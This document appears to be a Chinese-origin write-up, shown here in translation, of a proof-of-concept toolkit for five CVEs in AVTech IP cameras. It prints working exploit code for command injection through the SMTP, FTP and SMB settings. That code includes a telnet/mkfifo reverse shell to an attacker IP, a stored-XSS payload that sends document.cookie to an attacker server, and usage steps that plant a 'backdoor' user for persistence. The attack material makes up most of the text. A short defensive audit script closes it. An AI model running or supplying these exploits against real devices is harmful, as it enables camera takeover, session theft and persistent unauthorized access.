In-Depth Analysis: the AVTech IP Camera Exploit Toolkit


Project Title and Description

AVTech PoCs is a collection of proof-of-concept tools targeting several disclosed vulnerabilities in AVTech IP cameras. The project implements exploits for CVE-2025-57199, CVE-2025-57200, CVE-2025-57201, CVE-2025-57202 and CVE-2025-57203, and demonstrates the practical impact of these flaws through automated scripts.

Its core value is to give security researchers and penetration testers a complete set of test tools for verifying the security of AVTech IP cameras and raising awareness of the threats facing IoT devices.

Features

  • Multi-vulnerability support: full coverage of the five critical vulnerabilities CVE-2025-57199 through CVE-2025-57203
  • Multiple attack vectors
    • SMTP configuration command injection (CVE-2025-57199)
    • FTP configuration command injection (CVE-2025-57200)
    • SMB configuration command injection (CVE-2025-57201)
    • Network failure detection command injection (CVE-2025-57202)
    • Stored XSS (CVE-2025-57203)
  • Flexible attack modes
    • Direct command execution
    • Reverse shell
    • XSS session hijacking
  • Automated exploitation flow: automatic login, configuration retrieval, parameter poisoning, feature triggering
  • Detailed debug output: configuration shown as JSON for easier analysis and debugging

Installation Guide

System Requirements

  • Python 3.6+
  • A network path to the target device
  • Linux/macOS/Windows

Installing Dependencies

# Install the required Python dependency
pip install requests

# Clone the project
git clone <repository-url>
cd avtech-pocs

Environment Configuration

No special configuration is needed; just make sure the Python environment is set up correctly.

Platform Notes

  • All scripts are built on standard Python libraries (plus requests) and run cross-platform
  • The network connection must be able to reach the target device's web management port (88 by default)
  • The reverse shell feature requires a listener running on the attacking machine

Usage

Basic Usage Examples

1. SMTP command injection attack

python exploit_smtp.py --target-ip 192.168.1.100 --username admin --password admin --command "id"

2. FTP command injection attack

python exploit_ftp.py --target-ip 192.168.1.100 --username admin --password admin --command "uname -a"

3. Obtaining a reverse shell

# Start a listener on the attacking machine
nc -lvp 4444

# Run the reverse shell attack
python exploit_smtp.py --target-ip 192.168.1.100 --username admin --password admin --attacker-ip 192.168.1.50 --attacker-port 4444 --reverse-shell

4. XSS session theft

# Start an HTTP server listening on the attacking machine
python -m http.server 8080

# Run the XSS attack
python exploit_xss.py --target-ip 192.168.1.100 --username admin --password admin --attacker-ip 192.168.1.50 --attacker-port 8080

Typical Usage Scenarios

Scenario 1: Security assessment validation

# Check whether the device is vulnerable to SMTP injection
python exploit_smtp.py -t 192.168.1.100 -U admin -P admin -c "echo 'Vulnerable!' > /tmp/test.txt"

Scenario 2: Persistence

# Create a backdoor user via SMB configuration injection
python exploit_smb.py -t 192.168.1.100 -c "useradd -r -s /bin/bash backdoor"

Scenario 3: Lateral movement

# Steal the administrator's cookie via XSS to escalate privileges
python exploit_xss.py --target-ip 192.168.1.100 --attacker-ip 10.0.0.5 --attacker-port 9000

API Overview

The core of the project is the DGM1104 class, which provides the following main methods:

  • login(username, password): authenticate to the device
  • get_ftp_fields(): retrieve the FTP configuration
  • get_smtp_fields(): retrieve the SMTP configuration
  • get_smb_fields(): retrieve the SMB configuration
  • get_network_failure_fields(): retrieve the network failure detection configuration
  • set_config_fields(config_values): set configuration parameters
  • execute_ftp_test(): trigger the FTP test
  • execute_smtp_test(): trigger the SMTP test
  • add_user(username, password): add a user (used by the XSS attack)

Core Code

1. Main device interaction class (dgm1104.py)

import random
from base64 import b64encode
from copy import deepcopy
from requests import ReadTimeout, Session, Response
from typing import Dict, List, Optional
from urllib.parse import quote
import logging

class DGM1104:
    CONFIG_PATH: str = "/cgi-bin/user/Config.cgi"
    PWDGRP_PATH: str = "/cgi-bin/supervisor/PwdGrp.cgi"

    def __init__(self, hostname: str, port: int = 88, https: bool = False) -> None:
        self.session = Session()
        protocol: str = 'https' if https else 'http'
        self.base_url: str = f'{protocol}://{hostname}:{port}'

    def login(self, username: str, password: str) -> bool:
        """设备登录认证
        
        Args:
            username: 用户名
            password: 密码
            
        Returns:
            登录是否成功
        """
        account_string: str = f"{username}:{password}"
        account_string_b64: str = b64encode(account_string.encode()).decode()
        random_float: float = random.random()

        verify_path: str = f"/cgi-bin/nobody/VerifyCode.cgi?account={account_string_b64}&rnd={random_float}"
        url: str = self.base_url + verify_path

        response: Response = self.session.get(url)
        
        login_successful: bool = (
            response.status_code == 200 and
            len(self.session.cookies) >= 1
        )
        return login_successful

    def get_config_category(self, category: str = "Network.FTP") -> Optional[Dict[str, str]]:
        """获取指定配置类别的所有字段
        
        Args:
            category: 配置类别路径
            
        Returns:
            配置字典或None(失败时)
        """
        url: str = self.base_url + self.CONFIG_PATH
        data: Dict[str, str] = {
            "action": "get",
            "category": f"{category}.*"
        }
        
        try:
            response: Response = self.session.post(url=url, data=data)
            response_lines: List[str] = response.text.split('\n')[2:]
            
            if len(response_lines) <= 2:
                return None
            
            config_values: Dict[str, str] = {}
            for line in response_lines:
                first_equals_index = line.find('=')
                if first_equals_index == -1:
                    continue
                key: str = line[:first_equals_index]
                value: str = line[first_equals_index+1:]
                config_values[key] = value

            return config_values
            
        except Exception as e:
            logging.error(f"Failed to get config category {category}: {e}")
            return None

2. SMTP command injection exploit script (exploit_smtp.py)

import argparse
import json
import logging
import sys
from copy import deepcopy
from typing import Dict, Optional

from dgm1104 import DGM1104

EXIT_FAILURE: int = 1
EXIT_SUCCESS: int = 0

def exploit(
    target_ip: str,
    target_port: int,
    username: str,
    password: str,
    command: str,
) -> bool:
    """执行SMTP配置命令注入攻击
    
    Args:
        target_ip: 目标设备IP
        target_port: 目标设备端口
        username: 认证用户名
        password: 认证密码
        command: 要执行的命令
        
    Returns:
        攻击是否成功
    """
    # 初始化设备连接
    device: DGM1104 = DGM1104(
        hostname=target_ip,
        port=target_port,
    )
    
    # 登录设备
    logged_in:bool = device.login(
        username=username,
        password=password,
    )
    if not logged_in:
        logging.error("[!] Failed to log into device.")
        return False 
    logging.info("[+] Logged into device successfully.")
    
    # 获取原始SMTP配置
    original_smtp_fields: Optional[Dict[str, str]] = device.get_smtp_fields()
    if original_smtp_fields is None:
        logging.error("[!] Failed to get original SMTP fields")
        return False 
    
    # Print the original configuration (debug information)
    original_smtp_fields_json_str: str = json.dumps(
        original_smtp_fields,
        indent=4,
    )
    logging.debug(
        "[+] Retrieved Original SMTP Fields:\n" +
        original_smtp_fields_json_str
    )

    # Build the poisoned configuration (command injection)
    new_smtp_fields: Dict[str, str] = deepcopy(original_smtp_fields)
    new_smtp_fields["Network.SMTP.Sender"] = f"`{command}`"

    # Apply the poisoned configuration
    smtp_fields_set: bool = device.set_config_fields(
        config_values=new_smtp_fields,
    )
    if not smtp_fields_set:
        logging.error("[!] Failed to set SMTP fields")
        return False

    logging.debug("[+] Set SMTP sender field with poisoned value.")

    # Trigger the SMTP test, which executes the command
    smtp_test_executed: bool = device.execute_smtp_test()
    if not smtp_test_executed:
        logging.error("[!] Failed to execute SMTP test.")
        return False
    logging.info("[+] Command Executed!")

    return True

def reverse_shell(
    target_ip: str,
    target_port: int,
    username: str,
    password: str,
    attacker_ip: str,
    attacker_port: int,
) -> bool:
    """建立反向Shell连接
    
    Args:
        target_ip: 目标设备IP
        target_port: 目标设备端口
        username: 认证用户名
        password: 认证密码
        attacker_ip: 攻击者IP
        attacker_port: 攻击者监听端口
        
    Returns:
        反向Shell是否成功建立
    """
    # 构造反向Shell命令
    reverse_shell_command: str = (
        "TF=$(mktemp -u);mkfifo $TF && telnet " +
        attacker_ip +
        " " +
        str(attacker_port) +
        " 0<$TF | sh 1>$TF"
    )
    
    # Execute the reverse shell command through the SMTP injection
    return exploit(
        target_ip=target_ip,
        target_port=target_port,
        username=username,
        password=password,
        command=reverse_shell_command,
    )

3. XSS exploit script (exploit_xss.py)

import argparse
import sys
from typing import Optional

from dgm1104 import DGM1104

EXIT_FAILURE: int = 1
EXIT_SUCCESS: int = 0

# Default XSS payload: a simple JavaScript pop-up
DEFAULT_PAYLOAD: str = '<img src=x onerror="print()" />'

def exploit(
    target_ip: str,
    target_port: int,
    username: str,
    password: str,
    payload: str,
) -> bool:
    """执行存储型XSS攻击
    
    Args:
        target_ip: 目标设备IP
        target_port: 目标设备端口
        username: 认证用户名
        password: 认证密码
        payload: XSS攻击载荷
        
    Returns:
        攻击是否成功
    """
    # 初始化设备连接
    device: DGM1104 = DGM1104(
        hostname=target_ip,
        port=target_port,
    )

    # 登录设备
    logged_in:bool = device.login(
        username=username,
        password=password,
    )
    if not logged_in:
        print("[!] Failed to log into device.")
        return False 
    print("[+] Logged into device successfully.")

    # 添加恶意用户(用户名为XSS Payload)
    user_added: bool = device.add_user(
        username=payload,
        password="password"
    )
    if not user_added:
        print("[!] Failed to add user!")
        return False
    print(f"[+] Set created a user account with {payload} payload as username.")

    print(f"[*] Either visit the accounts page to trigger the payload, or wait for another user to.")
    return True

def generate_xss_cookie_payload(ip: str, port: str) -> str:
    """生成Cookie窃取XSS Payload
    
    Args:
        ip: 攻击者服务器IP
        port: 攻击者服务器端口
        
    Returns:
        构造好的XSS Payload
    """
    return f"""<img src=x onerror="this.src='http://{ip}:{port}/?'+document.cookie; this.removeAttribute('onerror');">"""

These core code excerpts show the project's implementation details: device interaction, exploitation logic and payload construction. The code is clearly structured and well commented, which makes it easy for security researchers to understand and modify.
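As an added defender-side example (not part of the project's code), the audit below covers the two tampering patterns the scripts above rely on: it parses a Config.cgi reply in the key=value-per-line layout that the dgm1104.py parser splits and flags values carrying shell metacharacters (the backtick-wrapped Network.SMTP.Sender), and it flags account names carrying markup (the stored-XSS user name). The sample dump and user list are constructed; the assumption is that a real device dump uses the same line layout.

```python
import re
from typing import Dict, List

# Shell metacharacters a poisoned value needs (the PoC wraps its command in backticks);
# legitimate values can contain ';' or '|', so treat hits as items to review, not proof.
SHELL_INJECTION_RE = re.compile(r"`|\$\(|&&|[;|\n]")
# Markup that has no business in an account name (the stored-XSS vector on this device).
HTML_INJECTION_RE = re.compile(r"<[a-zA-Z/!]|\bon\w+\s*=|javascript:", re.IGNORECASE)

# Constructed sample of a Config.cgi reply: same key=value-per-line layout the PoC parser splits.
CONSTRUCTED_CONFIG_DUMP = """HTTP/1.0 200 OK
Content-Type: text/plain

Network.SMTP.Server=smtp.example.com
Network.SMTP.Port=25
Network.SMTP.Sender=`id`
Network.SMTP.Receiver=alerts@example.com
"""

# Constructed account list; the third entry is the toolkit's default XSS payload.
CONSTRUCTED_USERNAMES = ["admin", "operator", '<img src=x onerror="print()" />']

def parse_config_dump(text: str) -> Dict[str, str]:
    """Parse key=value lines, skipping status and header lines that carry no '='."""
    values: Dict[str, str] = {}
    for line in text.splitlines():
        idx = line.find("=")
        if idx == -1:
            continue
        values[line[:idx].strip()] = line[idx + 1:]
    return values

def find_command_injection(config: Dict[str, str]) -> List[str]:
    """Return the config keys whose values carry shell metacharacters, sorted for stable output."""
    return sorted(key for key, value in config.items() if SHELL_INJECTION_RE.search(value))

def find_html_in_usernames(usernames: List[str]) -> List[str]:
    """Return account names containing HTML tags or inline event handlers."""
    return [name for name in usernames if HTML_INJECTION_RE.search(name)]

def audit(config_dump: str, usernames: List[str]) -> Dict[str, List[str]]:
    """Run both checks and return the findings as one report."""
    config = parse_config_dump(config_dump)
    return {
        "poisoned_config_keys": find_command_injection(config),
        "markup_in_usernames": find_html_in_usernames(usernames),
    }

if __name__ == "__main__":
    print(audit(CONSTRUCTED_CONFIG_DUMP, CONSTRUCTED_USERNAMES))
```

Running the audit against a periodic Config.cgi export and the account list gives a cheap integrity check for cameras that cannot be patched yet.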